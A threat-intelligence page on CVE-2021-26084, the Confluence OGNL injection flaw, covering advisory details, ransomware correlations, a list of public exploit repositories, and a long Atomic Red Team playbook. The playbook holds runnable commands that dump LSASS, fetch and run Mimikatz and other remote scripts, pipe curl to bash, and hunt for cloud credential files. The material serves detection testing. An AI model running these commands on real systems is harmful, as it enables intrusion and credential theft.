CVE-2021-26084
Overview
This vulnerability is an OGNL injection flaw in Atlassian Confluence Server and Data Center components. It arises from improper sanitization of user-supplied input within namespace handling, allowing injection of OGNL expressions. The flaw affects multiple Confluence Server and Data Center versions prior to specified patch releases, specifically in the server-side processing of HTTP POST requests targeting dynamic path endpoints.
Vulnerability Description
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
Impact
An unauthenticated attacker can execute arbitrary code on the affected Confluence Server or Data Center instance by exploiting this vulnerability. No user interaction or valid credentials are required, enabling remote full system compromise. This can lead to unauthorized access to sensitive data, disruption of services, and potential lateral movement within the network environment hosting the affected server.
Solution
Apply the security patches provided by Atlassian by upgrading Confluence Server and Data Center to versions 6.13.23 or later, 7.4.11 or later, 7.11.6 or later, or 7.12.5 or later as appropriate. Detailed patch instructions and advisory information are available on Atlassian's official issue tracker at https://jira.atlassian.com/browse/CONFSERVER-67940. No alternative workarounds are documented; patching is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
atomsilo
|
5 | correlation_misp |
|
atomsilo
|
5 | ransomware.live |
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
cerberimposter
|
MEDIUM | — | correlation_misp |
|
Ember Bear
|
MEDIUM | — | correlation_mitre |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability present in certain versions of Confluence Server and Data Center is characterized by an OGNL (Object-Graph Navigation Language) injection flaw. This weakness arises from improper handling of user input, allowing an attacker to manipulate OGNL expressions. By exploiting this vulnerability, an unauthenticated user can execute arbitrary code on the server, gaining unauthorized access to sensitive data and potentially compromising the entire system. The affected versions span a range from earlier releases to specific updates, indicating a significant window of exposure for organizations utilizing these platforms.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. Since the flaw allows unauthenticated access, attackers do not require valid credentials to initiate an attack. This can be achieved through various means, such as sending specially crafted requests to the server that contain malicious OGNL expressions. Once executed, these expressions can lead to remote code execution, enabling the attacker to perform actions such as data exfiltration, system manipulation, or even deploying additional malware. The simplicity of the attack method, combined with the high impact of successful exploitation, makes this vulnerability especially dangerous.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Confluence for collaboration and documentation. Successful exploitation could lead to unauthorized access to confidential information, including intellectual property, customer data, and internal communications. The potential for data breaches can result in significant financial losses, regulatory penalties, and reputational damage. Furthermore, the ability to execute arbitrary code means that attackers could establish persistent access to the system, complicating recovery efforts and increasing the overall risk to business continuity.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating Confluence to the latest versions is critical, as patches addressing this vulnerability have been released. Additionally, implementing web application firewalls (WAFs) can help filter out malicious requests that attempt to exploit the OGNL injection flaw. Monitoring logs for unusual activity, such as unexpected code execution or unauthorized access attempts, can also aid in early detection of potential exploitation. Furthermore, conducting regular security assessments and penetration testing can help identify and remediate vulnerabilities before they can be exploited by malicious actors.
In conclusion, the OGNL injection vulnerability in Confluence Server and Data Center presents a significant threat to organizations that utilize these platforms. The combination of unauthenticated access and the potential for arbitrary code execution creates a high-risk scenario that requires immediate attention. By implementing robust detection and mitigation strategies, organizations can protect themselves from the severe consequences associated with this vulnerability, ensuring the integrity and security of their systems and data.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the OGNL injection vulnerability in Atlassian Confluence Server and Data Center. This uptick, while modest, reflects continued adversary interest and activity, particularly from ransomware-affiliated groups such as atomsilo and Ember Bear, which remain actively leveraging this vulnerability in their campaigns. The persistence of publicly available proof-of-concept exploits on multiple platforms continues to lower the barrier for threat actors to weaponize this flaw. Although the EPSS score remains stable at a high level, indicating sustained exploit likelihood, the incremental rise in detection activity underscores the vulnerability’s ongoing relevance in the threat landscape. For defenders, this means that vigilance must be maintained as attackers continue to integrate CVE-2021-26084 into their operational playbooks, sustaining its critical risk profile.
Affected Products (8)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Atlassian Confluence WebWork OGNL Injection
exploits/multi/http/atlassian_confluence_webwork_ognl_injection
|
Benny Jacob, Jang, wvu | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated) | Fellipe Oliveira | webapps | java | - | View |
GitHub PoCs (35)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
hev0x/CVE-2021-26084_Confluence
Confluence Server Webwork OGNL injection
|
hev0x | 317 | 80 | 2021-09-01 | View |
|
0xf4n9x/CVE-2021-26084
CVE-2021-26084 Remote Code Execution on Confluence Servers
|
0xf4n9x | 72 | 38 | 2021-09-01 | View |
|
dinhbaouit/CVE-2021-26084
|
dinhbaouit | 53 | 27 | 2021-09-01 | View |
|
alt3kx/CVE-2021-26084_PoC
|
alt3kx | 53 | 16 | 2021-08-31 | View |
|
1ZRR4H/CVE-2021-26084
Atlassian Confluence CVE-2021-26084 one-liner mass checker
|
1ZRR4H | 30 | 11 | 2021-09-07 | View |
|
prettyrecon/CVE-2021-26084_Confluence
CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection 回显
|
prettyrecon | 1 | 32 | 2021-09-01 | View |
|
crowsec-edtech/CVE-2021-26084
CVE-2021-26084 - Confluence Pre-Auth RCE | OGNL injection
|
crowsec-edtech | 21 | 6 | 2021-08-31 | View |
|
Vulnmachines/Confluence_CVE-2021-26084
Remote Code Execution on Confluence Servers : CVE-2021-26084
|
Vulnmachines | 8 | 7 | 2021-09-01 | View |
|
taythebot/CVE-2021-26084
CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)
|
taythebot | 8 | 6 | 2021-09-01 | View |
|
lleavesl/CVE-2021-26084
CVE-2021-26084,Atlassian Confluence OGNL注入漏洞
|
lleavesl | 7 | 4 | 2021-10-26 | View |
|
orangmuda/CVE-2021-26084
CVE-2021-26084 - Confluence Server Webwork OGNL injection
|
orangmuda | 4 | 3 | 2021-10-06 | View |
|
Loneyers/CVE-2021-26084
CVE-2021-26084 Confluence OGNL injection
|
Loneyers | 3 | 4 | 2021-09-03 | View |
|
JKme/CVE-2021-26084
CVE-2021-26084 Remote Code Execution on Confluence Servers, reference: https://github.com/httpvoid/writeups/blob/main/Co...
|
JKme | 5 | 1 | 2021-09-01 | View |
|
BBD-YZZ/Confluence-RCE
confluence rce (CVE-2021-26084, CVE-2022-26134, CVE-2023-22527)
|
BBD-YZZ | 5 | 1 | 2024-05-29 | View |
|
CrackerCat/CVE-2021-26084
Atlassian Confluence Pre-Auth RCE
|
CrackerCat | 0 | 6 | 2021-09-01 | View |
|
b1gw00d/CVE-2021-26084
批量检测
|
b1gw00d | 0 | 6 | 2021-09-01 | View |
|
ludy-dev/CVE-2021-26084_PoC
[CVE-2021-26084] Confluence pre-auth RCE test script
|
ludy-dev | 3 | 1 | 2021-09-18 | View |
|
toowoxx/docker-confluence-patched
Patched Confluence 7.12.2 (CVE-2021-26084)
|
toowoxx | 2 | 2 | 2021-09-08 | View |
|
attacker-codeninja/CVE-2021-26084
Confluence OGNL injection
|
attacker-codeninja | 0 | 4 | 2021-09-09 | View |
|
BeRserKerSec/CVE-2021-26084-Nuclei-template
This nuclei template is to verify the vulnerability without executing any commands to the target machine
|
BeRserKerSec | 3 | 0 | 2021-09-02 | View |
|
GlennPegden2/cve-2021-26084-confluence
A quick and dirty PoC of cve-2021-26084 as none of the existing ones worked for me.
|
GlennPegden2 | 1 | 1 | 2021-09-07 | View |
|
TheclaMcentire/CVE-2021-26084_Confluence
Exploit CVE 2021 26084 Confluence
|
TheclaMcentire | 1 | 1 | 2021-10-20 | View |
|
Jun-5heng/CVE-2021-26084
confluence远程代码执行RCE / Code By:Jun_sheng
|
Jun-5heng | 1 | 1 | 2021-10-25 | View |
|
nahcusira/CVE-2021-26084
|
nahcusira | 1 | 0 | 2024-04-28 | View |
|
bcdannyboy/CVE-2021-26084_GoPOC
PoC of CVE-2021-26084 written in Golang based on https://twitter.com/jas502n/status/1433044110277890057?s=20
|
bcdannyboy | 1 | 0 | 2021-09-01 | View |
|
nizar0x1f/CVE-2021-26084-patch-
CVE-2021-26084 patch as provided in "Confluence Security Advisory - 2021-08-25"
|
nizar0x1f | 1 | 0 | 2021-09-08 | View |
|
maskerTUI/CVE-2021-26084
This is exploit
|
maskerTUI | 0 | 1 | 2021-09-02 | View |
|
wolf1892/confluence-rce-poc
Setting up POC for CVE-2021-26084
|
wolf1892 | 0 | 1 | 2021-09-04 | View |
|
p0nymc1/CVE-2021-26084
CVE-2021-26084
|
p0nymc1 | 0 | 0 | 2021-09-03 | View |
|
Osyanina/westone-CVE-2021-26084-scanner
CVE-2021-26084 Remote Code Execution on Confluence Servers
|
Osyanina | 0 | 0 | 2021-09-01 | View |
|
smallpiggy/cve-2021-26084-confluence
Just run command without brain
|
smallpiggy | 0 | 0 | 2021-09-02 | View |
|
Xc1Ym/cve_2021_26084
cve-2021-26084 EXP
|
Xc1Ym | 0 | 0 | 2021-09-03 | View |
|
wdjcy/CVE-2021-26084
|
wdjcy | 0 | 0 | 2021-10-02 | View |
|
30579096/Confluence-CVE-2021-26084
OGNL Injection in Confluence server version < 7.12.5
|
30579096 | 0 | 0 | 2021-12-17 | View |
|
quesodipesto/conflucheck
Python 3 script to identify CVE-2021-26084 via network requests.
|
quesodipesto | 0 | 0 | 2021-11-23 | View |
Ransomware Groups 4
Threat Feed
40 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (5 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
